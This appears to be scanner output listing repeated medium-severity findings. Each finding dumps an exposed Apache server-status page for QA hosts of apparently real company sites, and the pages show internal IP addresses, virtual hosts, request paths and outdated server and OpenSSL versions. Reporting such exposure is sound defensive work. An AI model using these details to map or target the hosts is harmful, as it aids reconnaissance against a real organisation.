/etc.clientlibs/diagnostics/components/content/mini_e_catal 42-02185858/1600/28738K 3.76229962800108167.99.88320.16 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 43-0307660/2988/29261_ 7.00661023180380.010.31263.82 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/content/multiselect/ 44-02185992/1484/28737K 3.40258122147677205.24.20297.30 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 45-02
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c0d43eb20
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 02-Jun-2024 03:29:59 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 25 days 13 hours 30 minutes 9 seconds Server load: 0.03 0.03 0.00 Total accesses: 2434564 - Total Traffic: 21.3 GB - Total Duration: 183446964 CPU Usage: u117.56 s316.44 cu3358.77 cs2485.18 - .284% CPU load 1.1 requests/sec - 10.1 kB/second - 9.2 kB/request - 75.3511 ms/request 37 requests currently being processed, 39 idle workers KKKR..K._.__K_KKK.KK...__KRK__R__K__.K_____._KK_K_RK____K_.K_._K ..K_K_..K._.....K.K___R....._K_.__W...K_KKK_.................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-02760220/475/25604K 1.049192069824133.01.41177.53 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 1-0249682/682/25360K 1.45144131889810186.41.65233.09 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 2-056413/157/106419K 0.3201115581096.60.73321.60 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 3-033830/846/23054R 2.0034828321441710.02.21262.72 10.253.106.203http/1.1 4-0-0/0/26730. 0.003301020615590.00.00288.85 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-0-0/0/26071. 0.003300024773090.00.00268.78 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 6-0117947/868/25565K 1.876411251169415.41.98466.94 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-0-0/0/23164. 0.002991025624630.00.00243.82 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-0117140/3074/24913_ 7.6721223951210.010.55296.22 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-0-0/0/30030. 0.002993016707050.00.00236.01 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 10-0163700/2811/25207_ 6.36911120680630.09.41481.44 10.253.106.203http/1.1 11-0137420/746/34378_ 1.632921217697090.02.08201.90 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 12-02760453/651/24852K 1.46223122009852118.81.66318.77 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 13-012750/336/25138_ 0.73541319115910.01.62207.72 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 14-023105172/2304/25477K 5.20104132015066387.06.57346.59 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 15-0231189/2842/38488K 6.2530111220259019.96.71311.55 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 16-0564515/85/73626K 0.186911218296433.10.20279.74 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 17-0-0/0/23523. 0.003296021919880.00.00231.41 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-0564876/282/22142K 0.6899121872001167.70.72217.47 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 19-02312316/2070/22651K 5.061411217921934.88.97379.59 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 20-0-0/0/23208. 0.003299024378300.00.00289.49 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0-0/0/25885. 0.003298024955960.00.00216.67 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 22-0-0/0/24251. 0.002992019030580.00.00300.72 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-032200/2373/23704_ 5.14104023010320.06.07262.30 10.253.106.226http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.2023. 24-012820/417/24346_ 0.906957520971680.01.11218.99 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 25-0323323/1988/24552K 4.6474649213151251.05.78248.83 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 26-056510/195/25864R 0.424851218919610.00.47236.51 10.253.106.203http/1.1 27-0128386/302/59964K 0.649132126527191.90.69235.12 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 28-056520/55/24366_ 0.1331316850890.00.12187.08 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 29-056530/309/21497_ 0.669114023833000.01.38300.21 10.253.106.203http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.js?v= HTTP/1 30-046090/2526/24575R 5.733681024323250.07.00263.06 10.253.106.226http/1.1 31-0141910/1406/25407_ 3.322981216786650.04.49294.27 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 32-012840/208/23160_ 0.443011420029020.01.03214.47 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-0176705072/70991/170058K 64.9120609615130315.0129.40335.64 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0201400/2064/22654_ 4.841381122933440.05.98156.95 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 35-056540/46/24269_ 0.0921130172680.00.10190.11 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 36-0-0/0/23721. 0.003297021985120.00.00196.76 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-0103065073/70739/82029K 55.63501403709130317.1127.68217.52 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0137440/674/22156_ 1.678133420908820.02.78178.06 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 39-012860/599/22185_ 1.3681018529240.03.67220.83 10.253.106.203http/1.1 40-056550/369/20260_ 0.79911316683620.00.81211.89 10.253.106.226http/1.1 41-012870/294/21608_ 0.6969101021021960.00.80167.15 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-0117040/2308/21064_ 5.043001123337240.05.91285.60 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 43-0-0/0/22052. 0.003002018670180.00.00235.78 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0137450/530/20313_ 1.21219816751090.01.61265.92 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/components/allergen_fact_sheet/clie 45-01982939/3142/22172K 7.0724812231331388.511.81326.44 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c459fb347
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Saturday, 01-Jun-2024 04:51:32 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 24 days 14 hours 51 minutes 43 seconds Server load: 0.05 0.03 0.00 Total accesses: 2187810 - Total Traffic: 20.3 GB - Total Duration: 166822189 CPU Usage: u113.89 s293.67 cu3135.8 cs2170.37 - .269% CPU load 1.03 requests/sec - 10.0 kB/second - 9.8 kB/request - 76.2508 ms/request 37 requests currently being processed, 33 idle workers WR_.K._.._KR._K_.R_RKKRK_R_K__.__KR__KRR__.KKR__R._KK__R_KRR__K. .._____K__RR....KK....._......R..........._R.................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-01684813/3460/22922W 8.0400190011416.312.25166.98 10.253.106.203http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 1-0162580/29/21969R 0.085391216972760.00.88191.38 10.253.106.203http/1.1 2-0116060/217/103388_ 0.62135011968730.00.94309.96 10.253.106.203http/1.1 3-0-0/0/21003. 0.001576020337530.00.00253.59 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 4-0152473/1059/23729K 2.48161118318746.42.98278.48 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 5-0-0/0/22929. 0.00473023209120.00.00260.15 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 6-0162640/9/22777_ 0.041181322782060.00.13456.39 10.253.106.203http/1.1 7-0-0/0/21081. 0.001119021475730.00.00233.16 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-0-0/0/21661. 0.001522022216790.00.00284.34 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 9-093680/2869/26736_ 6.6023113914956480.08.44225.91 10.253.106.226http/1.1 10-0163709/11/22407K 0.0224711191072424.80.03472.06 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 11-0163900/10/31286R 0.025201216104060.00.03193.27 10.253.106.226http/1.1 12-0-0/0/22016. 0.001571017812980.00.00305.57 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 13-016140/318/22938_ 0.691491216597300.00.73194.69 10.253.106.203http/1.1 14-01228710/2311/22903K 5.38211186743322.57.93336.83 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 15-0181440/710/35358_ 1.55331220418870.02.14303.73 10.253.106.203http/1.1 16-0-0/0/70518. 0.001589020269230.00.00263.75 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 17-0200050/2355/21471R 5.31453819989600.06.53220.12 10.253.106.226http/1.1 18-0126260/886/19513_ 2.031487017104210.02.49206.10 10.253.106.203http/1.1 19-0318530/0/20391R 0.00539020549450.00.00369.80 10.253.106.226http/1.1 20-0164239/2681/20739K 6.86265639228900639.545.73281.80 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /phadia/us/en/our-solutions/elia-autoimmunity-solutions/vas 21-0126271/1214/23054K 2.7616781923355931.84.03205.36 10.253.106.226http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 22-0318560/5/22369R 0.014871018074780.00.02295.01 10.253.106.203http/1.1 23-0318576/11/21074K 0.0214512214050615.10.05253.35 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 24-0156410/7/21360_ 0.011351117059320.00.02206.25 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 25-0318580/9/22226R 0.024361419902560.00.05240.32 10.253.106.203http/1.1 26-0105590/3622/23128_ 8.541411117241690.011.37226.79 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-03185912/12/57141K 0.0213812197622830.90.03226.97 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 28-0156420/13/22015_ 0.031231215458360.00.03179.36 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 29-0156430/23/18961_ 0.371239721284580.01.05290.88 10.253.106.226http/1.1 30-0-0/0/21848. 0.001677022868810.00.00254.68 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0152520/1308/22514_ 3.132021215183610.04.07284.12 10.253.106.203http/1.1 32-0242590/1944/20702_ 4.461851218660530.05.61206.14 10.253.106.226http/1.1 33-01767062457/62840/161907K 56.7451602158115266.2114.70320.94 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0318600/0/20132R 0.00496020805200.00.00149.34 10.253.106.226http/1.1 35-0133340/2520/22146_ 6.022801328521360.09.33182.12 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 36-0147520/3359/21577_ 7.974734718489550.09.64190.04 10.253.106.226http/1.1 37-01030662458/62588/73878K 47.32811395632115268.3112.98202.83 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0318610/2/19554R 0.03493108417128180.00.15168.56 10.253.106.203http/1.1 39-0318620/3/19325R 0.014601217024500.00.01197.53 10.253.106.203http/1.1 40-016150/387/17696_ 1.03471114467880.01.63204.30 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-0239720/2720/19535_ 6.35271119722680.09.09159.94 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-0-0/0/18599. 0.001582021971680.00.00279.07 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-03224718/733/19765K 1.7218813173364352.12.75228.24 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 44-03224813/620/17978K 1.451671339153813234.31.62257.46 10.253.106.226http/1.1qa1.allergyinsider.com:80POST / HTTP/1.1 45-0318630/2/18863R 0.004461218564600.00.00313.50 10.253.106.203http/1.1 46-066250/2047/18485_ 4.641831316877390.06.44221.51 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 47-0156440/15/19757_ 0.131234917472850.01.95196.54 10.253.106.226http/1.1 48-0274630/2767/17210R 6.643451416034840.09.33236.47 10.253.106.203http/1.1 49-0-0/0/18269. 0.001676012400950.00.00148.92 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-016160/309/18443_ 0.70264
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cc5f8a447
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 30-May-2024 02:56:19 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 22 days 12 hours 56 minutes 30 seconds Server load: 0.00 0.01 0.00 Total accesses: 1733745 - Total Traffic: 17.8 GB - Total Duration: 135039765 CPU Usage: u42.32 s162.98 cu2704.57 cs1686.36 - .236% CPU load .89 requests/sec - 9.6 kB/second - 10.7 kB/request - 77.8891 ms/request 39 requests currently being processed, 32 idle workers _R__R_R_RK.__KR_K.KR__KRRR_R_KK_KKKKRKRK._..._......K._._K___.RR ..____.__..._K.RRK__.W_.KRK.K.._.R_............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0310420/9/17330_ 0.002371613220890.00.06141.32 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 1-0164530/4/16616R 0.005621114051940.00.02168.34 10.253.106.226http/1.1 2-022320/0/98001_ 0.0016507837860.00.00288.59 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 3-0143690/338/16527_ 1.312373916825890.02.87196.71 10.253.106.226http/1.1 4-0105580/13/17965R 0.0451157215289590.00.05199.00 10.253.106.203http/1.1 5-0116490/37/17931_ 0.11235020491450.02.55227.77 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-recen 6-0123470/12/17546R 0.035111317335540.00.07436.54 10.253.106.203http/1.1 7-0313100/5/16377_ 0.052367318265950.00.34190.56 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/jquery.min.js HTT 8-0105630/30/16596R 0.253011219668730.00.59262.70 10.253.106.203http/1.1 9-01165025/60/21882K 0.8416440812167131801.72.28176.83 10.253.106.203http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/handlebars/compiled/templ 10-0-0/0/17046. 0.00236015911400.00.00450.66 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 11-0318620/11/26391_ 0.06741213190970.00.22161.78 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 12-0318630/3/16515_ 0.00235014842830.00.01278.88 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-dependencies.m 13-0318641/14/17171K 0.022503913534574.60.05172.15 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 14-0326070/0/17849R 0.00562014958540.00.00302.08 10.253.106.203http/1.1 15-0318660/19/29636_ 0.061261116886390.00.11275.89 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 16-01891613/143/65098K 0.93165651675727412.22.15237.40 10.253.106.226http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/print.min.css?v= HTTP/1.1 17-0-0/0/16406. 0.00235017092950.00.00202.21 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-07652/2/15306K 0.002341114705054.60.00160.44 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 19-07660/0/16150R 0.00538018157870.00.00342.00 10.253.106.226http/1.1 20-0129250/35/15924_ 0.142366619742120.00.28211.31 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-base.min.js HT 21-0318670/13/17293_ 0.02331319037990.00.07170.60 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 22-0326081/1/17473K 0.002341149477012.40.01261.25 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-recen 23-0326090/0/16532R 0.00562014971140.00.00231.44 10.253.106.203http/1.1 24-0326100/0/16912R 0.00562014573020.00.00182.92 10.253.106.226http/1.1 25-0326110/0/17505R 0.00562014626020.00.00218.83 10.253.106.226http/1.1 26-0145090/37/17283_ 0.50235014146010.00.75204.88 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/slick_carousel.mi 27-07670/0/52498R 0.00537015235990.00.00198.29 10.253.106.226http/1.1 28-013700/1054/16034_ 2.202581112078730.04.32156.79 10.253.106.203http/1.1 29-01411211/39/16077K 0.20135111956209210.10.97273.62 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 30-07682/2/16101K 0.002340158723310.50.01233.28 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/ofi.min.js HTTP/1.1 31-0164650/33/17461_ 0.142821111139020.00.51265.21 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 32-01702420/69/16644K 0.50047145050977.70.93191.74 10.253.106.226http/1.1qa1.unitylabservices.com:80GET /v2/_catalog HTTP/1.1 33-01767044486/44869/143936K 38.022058496082097.882.31288.55 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-077011/11/15942K 0.06165931634381142.10.14124.87 10.253.106.226http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/tabletlibs.min.css?v= HTT 35-0170255/16/17159K 0.0816568218016136.50.29148.87 10.253.106.203http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.css?v= HT 36-0170260/6/16222R 0.015251213208520.00.02160.65 10.253.106.203http/1.1 37-01030644487/44617/55907K 29.3760137805482099.980.59170.44 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-07720/0/15872R 0.00537014854950.00.00129.45 10.253.106.226http/1.1 39-093113/30/14989K 0.13234371360430107.07.73178.94 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/clientlib-all.min.css HTTP/1.1 40-0-0/0/14391. 0.003602011027500.00.00189.10 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0170270/39/15284_ 0.192071217378480.04.34140.88 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 42-0-0/0/14121. 0.003593017660510.00.00259.68 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-0-0/0/15044. 0.003596014859740.00.00209.46 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0-0/0/14086. 0.002995011509370.00.00226.23 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-0128670/392/13577_ 1.4546315073350.04.02287.50 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/slick_carousel.mi 46-0-0/0/14492. 0.002997013438970.00.00200.08 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-0-0/0/14818. 0.002996013537540.00.00171.86 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-0-0/0/12460.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cc639ed95
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 29-May-2024 04:42:13 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 21 days 14 hours 42 minutes 24 seconds Server load: 0.00 0.00 0.00 Total accesses: 1650750 - Total Traffic: 16.9 GB - Total Duration: 128443759 CPU Usage: u47.93 s153.11 cu2569.49 cs1611.81 - .235% CPU load .884 requests/sec - 9.5 kB/second - 10.8 kB/request - 77.8093 ms/request 37 requests currently being processed, 35 idle workers R__KK__K______K__R_KK.___RK__R.R_KR__K_RK_KKWR__R_._KKK_KKK..R_. .R_..RRKR._.____........K..R...R................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0112360/17/16672R 0.125611112712430.00.24132.74 10.253.106.203http/1.1 1-0242790/288/15890_ 0.8426913492980.01.97161.60 10.253.106.203http/1.1 2-0153120/0/97115_ 0.0019907021220.00.00282.44 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 3-0114561/7/15706K 0.012591015009252.90.02184.30 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 4-0127763/16/17088K 0.026611133554712.70.12189.95 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 5-0127800/9/16799_ 0.0129414117976010.00.04208.34 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/phadia/europe/de/our-solutions/elia-au 6-0127810/12/16604_ 0.012571115217950.00.11431.31 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-080113/20/15621K 0.0412312177744215.00.68185.83 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/allergen_fact_she 8-0195510/591/15903_ 1.202581119147650.02.35254.73 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-0271810/647/21058_ 1.24651111773990.04.54167.12 10.253.106.226http/1.1 10-0153130/0/16062_ 0.00198015373190.00.00440.42 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 11-0187840/92/25572_ 0.18571012528380.00.69156.08 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 12-0208240/390/15605_ 0.79256014313850.02.50272.86 10.253.106.226http/1.1 13-094100/14/16203_ 0.032261912971960.00.09163.62 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 14-0243381/508/17024K 0.881991012900529.52.53294.90 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/content/questionnair 15-080120/46/28878_ 0.102264014923770.01.20271.99 10.253.106.203http/1.1 16-0153140/0/64430_ 0.00198016393180.00.00233.03 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 17-0143830/0/15533R 0.00562016485360.00.00160.68 10.253.106.203http/1.1 18-0197690/108/14470_ 0.332561114146280.00.93154.42 10.253.106.226http/1.1 19-0197727/243/15236K 0.4830049175705937.83.14336.42 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 20-0143841/1/14853K 0.002331117736193.10.00206.22 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 21-0-0/0/16363. 0.00508018517110.00.00164.35 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 22-068160/1/16589_ 0.002031014148100.00.00240.25 10.253.106.203http/1.1 23-0105270/23/15888_ 0.0325633314594320.00.15226.48 10.253.106.203http/1.1 24-0256840/610/15961_ 1.2820310313884360.05.01176.84 10.253.106.203http/1.1 25-0273460/405/16811R 0.673411014374310.02.99215.67 10.253.106.203http/1.1 26-0293011/415/16195K 0.962551013539083.12.44199.60 10.253.106.203http/1.1qa1.allergyinsider.com:80GET 